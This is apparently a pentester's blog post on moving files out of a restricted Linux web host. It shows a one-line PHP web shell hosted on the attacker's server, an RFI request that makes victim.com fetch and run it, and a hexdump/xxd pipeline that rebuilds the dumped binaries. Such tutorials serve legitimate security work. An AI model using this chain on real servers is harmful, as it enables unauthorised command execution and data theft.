Handy File Transfer Technique

Introduction

Contrary to this blog’s usual material, this time I want to write about a quick technique I found to work pretty well today for transferring files between two hosts using the xxd and hexdump utilities!

I needed to use this technique as part of a pentest, as the host was a bit limited on the tools on the box. The prerequisites are a page with a file inclusion vulnerability (preferably remote) and a PHP configuration that has not disabled the system function.

Scenario

The host was a 3-bit RHEL 3.6 and with kernel version 2.6.9-89. The scenario was a vulnerable web-app with a remote file inclusion vulnerability. I wanted to use file inclusion in order to view file contents, but since it was a PHP website the PHP engine would render the files as part of the page rather than include them.

In addition to the above, I was unable to use PHP’s stream filters in order to encode the contents and base64 was not installed on the host (more on this later).

The solution

Since the file inclusion is remote, we can host a file on our server that looks like this:

<?php system($_GET['cmd']); ?>

If we save that on our server’s root as shell.php, and the file inclusion looks something like:

http://victim.com/index.php?page=<insert page here>

then we can simply request

http://victim.com/index.php?page=http://myaddress.here/shell.php&cmd=<standard unix commands>

We’ve exploited RFI to gain command execution, and from there on we can get to a shell. However, my problem was reading the code of the pages. Through the command injection I tried doing something along the lines of cat page | base64 but to no avail as base64 was not installed (a big wat moment)! Luckily, hexdump was installed instead!

hexdump[1] is a unix utility that takes a file as input and prints it in a hex-encoded format. We can use it in conjunction with xxd[2] (which was not present on the target machine) on our end, whose -r option turns a hex dump back into binary!

So the attack would look like this:

http://victim.com/index.php?page=http://myaddress.here/shell.php&cmd=hexdump%20file.zip

And the output on the page would look something like

0000000 8b1f 0008 e495 52c0 0300 bdec 5fff 371b
0000010 3ff2 fafe fb35 f078 a83f f17e db39 b18d
0000020 2131 0a5f 9481 6902 1d79 0e01 7348 137d
.......

You might need to tweak this output by removing any empty lines from the end of the output, as I’ve run into situations where hexdump has appended some empty lines at the end of the dump for no apparent reason. Note also that hexdump replaces a run of identical 16-byte lines with a single line containing just a * (run it with -v if the file contains such runs), and that its last line is an offset only, which is the length of the file. Save this to a text file called file.hexdump so we can process it some more and turn it back into binary!

The catch is that hexdump’s default output groups the bytes into 16-bit words in the host’s byte order (little-endian on x86), so each pair of bytes appears swapped: where the file holds the bytes 1f 8b, hexdump prints 8b1f, and xxd needs to read 1f8b in order to reproduce the original bytes (hence the sed expression in the command below, which swaps every pair of two-digit groups). The final command to turn file.hexdump back into file.zip is:

cut -s -d' ' -f2-9 file.hexdump | tr -d ' \n' | sed -e 's/\([a-f0-9]\{2\}\)\([a-f0-9]\{2\}\)/\2\1/g' | xxd -r -p > file.zip

After this, file.zip is the target zip file again, byte for byte!

Conclusion

This is of course a general-purpose technique, but the more interesting cases arise when we need to grab binary files from a web server, as that can sometimes be a bit tricky to do with file inclusion alone. The technique described here helps with downloading binary files by exploiting file inclusion and command injection in order to render the files on the page as ASCII text, which we can afterwards convert back into binary!

Links

[1] http://linux.die.net/man/1/hexdump

[2] http://linux.die.net/man/1/xxd
